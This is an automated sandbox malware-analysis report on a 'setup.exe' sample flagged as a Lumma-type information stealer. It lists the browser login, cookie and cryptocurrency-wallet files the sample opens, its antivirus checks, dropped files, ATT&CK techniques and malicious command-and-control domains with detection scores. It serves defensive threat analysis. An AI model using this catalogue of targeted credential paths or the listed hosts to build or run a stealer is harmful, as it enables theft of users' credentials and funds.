          Source: BrightLib.exe, 00000025.00000002.2607198413.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000000.2570070848.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-T64JA.tmp.9.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: setup.exe Binary or memory string: ProgManU
          Source: BrightLib.exe, 00000025.00000002.2607198413.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000025.00000000.2570070848.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-T64JA.tmp.9.drBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
          Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2dd37f98 VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Code function: 37_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,37_2_00491486
          Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: setup.exe, 00000000.00000003.1948459100.000000000098E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2005844284.0000000000986000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1970399938.000000000098B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: les%\Windows Defender\MsMpeng.exe
          Source: setup.exe, 00000000.00000003.1930721664.000000000098E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1930295451.0000000003670000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1930354486.0000000000905000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1930354486.0000000000942000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: find.exe, 0000001C.00000002.2514157581.000002962877B000.00000004.00000020.00020000.00000000.sdmp, find.exe, 0000001C.00000002.2513784792.00000296286E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
          Source: C:\Users\user\Desktop\setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara match File source: sslproxydump.pcap, type: PCAP
          Source: Yara match File source: Process Memory Space: setup.exe PID: 7252, type: MEMORYSTR
          Source: setup.exe, 00000000.00000002.2086918347.0000000000941000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
          Source: setup.exe, 00000000.00000002.2086918347.0000000000941000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
          Source: setup.exe, 00000000.00000002.2086918347.0000000000941000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
          Source: setup.exe, 00000000.00000003.1900295071.00000000008E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
          Source: setup.exe, 00000000.00000003.1900295071.000000000093B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
          Source: setup.exe, 00000000.00000003.1900295071.0000000000962000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
          Source: setup.exe, 00000000.00000002.2086918347.0000000000941000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
          Source: setup.exe, 00000000.00000003.1900295071.00000000008E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: setup.exe, 00000000.00000003.1900197149.000000000096A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
          Source: C:\Users\user\Desktop\setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Ledger Live
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Binance
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
          Source: C:\Users\user\Desktop\setup.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\BPMLNOBVSB
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\ONBQCLYSPU
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\XZXHAVGRAG
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\UMMBDNEQBN
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
          Source: C:\Users\user\Desktop\setup.exe, Directory queried: C:\Users\user\Documents\NEBFQQYWPS
          Source: Yara match, File source: Process Memory Space: setup.exe PID: 7252, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match, File source: sslproxydump.pcap, type: PCAP
          Source: Yara match, File source: Process Memory Space: setup.exe PID: 7252, type: MEMORYSTR
          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: 121 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
          Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
          Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 12 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
          Defense Evasion: 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 221 Virtualization/Sandbox Evasion; 12 Process Injection; Indicator Removal from Tools; HTML Smuggling
          Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: 1 System Time Discovery; 11 File and Directory Discovery; 224 System Information Discovery; 1 Query Registry; 521 Security Software Discovery; 221 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 2 System Owner/User Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
          Collection: 1 Archive Collected Data; 31 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
          [Behavior graph (image not preserved): Behavior Graph ID: 1582503, Sample: setup.exe, Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100]

          Source | Detection | Scanner | Label | Link
          setup.exe | 3% | ReversingLabs | |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe | 39% | ReversingLabs | Win32.Spyware.Lummastealer |
          C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
          C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy) | 8% | ReversingLabs | |
          C:\Users\user\AppData\Roaming\ColorStreamLib\is-T64JA.tmp | 8% | ReversingLabs | |

          No Antivirus matches
          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          https://learningypr.click/api | 100% | Avira URL Cloud | malware |
          https://learningypr.click/apb | 100% | Avira URL Cloud | malware |
          learningypr.click | 100% | Avira URL Cloud | malware |
          https://klipvumisui.shop:443/int_clp_sha.txt | 100% | Avira URL Cloud | malware |
          http://michaeluno.jp/4 | 0% | Avira URL Cloud | safe |
          https://learningypr.click/apiS | 100% | Avira URL Cloud | malware |
          http://www.toolwiz.com | 0% | Avira URL Cloud | safe |
          http://www.autohotkey.comCould | 0% | Avira URL Cloud | safe |
          https://learningypr.click/apic | 100% | Avira URL Cloud | malware |
          https://learningypr.click/apij | 100% | Avira URL Cloud | malware |
          https://learningypr.click/pp | 100% | Avira URL Cloud | malware |
          https://klipvumisui.shop/ | 100% | Avira URL Cloud | malware |
          https://learningypr.click/pi | 100% | Avira URL Cloud | malware |
          http://crl.usertru | 0% | Avira URL Cloud | safe |
          https://learningypr.click/Q | 100% | Avira URL Cloud | malware |
          https://learningypr.click:443/api | 100% | Avira URL Cloud | malware |
          https://learningypr.click/apies=0F | 100% | Avira URL Cloud | malware |
          http://crl.micro4f | 0% | Avira URL Cloud | safe |
          https://learningypr.click/apiF | 100% | Avira URL Cloud | malware |
          https://cegu.shop/8574262446/ph.txt3h | 100% | Avira URL Cloud | malware |
          http://crl.microsoft.co | 0% | Avira URL Cloud | safe |
          https://klipvumisui.shop/int_clp_sha.txt~ | 100% | Avira URL Cloud | malware |

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          cegu.shop | 185.161.251.21 | true | false | | high
          learningypr.click | 104.21.32.1 | true | true | | unknown
          klipvumisui.shop | 172.67.208.58 | true | false | | high
          dfgh.online | unknown | unknown | false | | high

          Name | Malicious | Antivirus Detection | Reputation
          scentniej.buzz | false | | high
          learningypr.click | true | Avira URL Cloud: malware | unknown
          https://learningypr.click/api | true | Avira URL Cloud: malware | unknown
          rebuildeso.buzz | false | | high
          appliacnesot.buzz | false | | high
          screwamusresz.buzz | false | | high
          cashfuzysao.buzz | false | | high
          inherineau.buzz | false | | high
          hummskitnj.buzz | false | | high
          https://klipvumisui.shop/int_clp_sha.txt | false | | high

          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brsetup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://learningypr.click/pisetup.exe, 00000000.00000002.2078744236.00000000008B9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://learningypr.click/ppsetup.exe, 00000000.00000003.1885564075.000000000095E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                http://crl.usertruF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://learningypr.click/Qsetup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                  high
                                                                                                  https://klipvumisui.shop/setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://learningypr.click:443/apisetup.exe, 00000000.00000003.1828202359.0000000000904000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1948459100.000000000096D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2088273574.000000000096D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://support.microsofsetup.exe, 00000000.00000003.1829977664.0000000003704000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0setup.exe, 00000000.00000003.2073247216.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                        high
                                                                                                        http://www.info-zip.org/BrightLib.exe, 00000025.00000002.2630344211.000000003A04C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://learningypr.click/apiFsetup.exe, 00000000.00000003.1841688890.0000000003666000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://learningypr.click/apies=0Fsetup.exe, 00000000.00000003.1828202359.000000000094A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          http://ocsp.securetrust.com/0?setup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                            high
                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplessetup.exe, 00000000.00000003.1830105452.0000000003691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.micro4fpowershell.exe, 00000004.00000002.2025410025.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://repository.certum.pl/cscasha2.cer0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                high
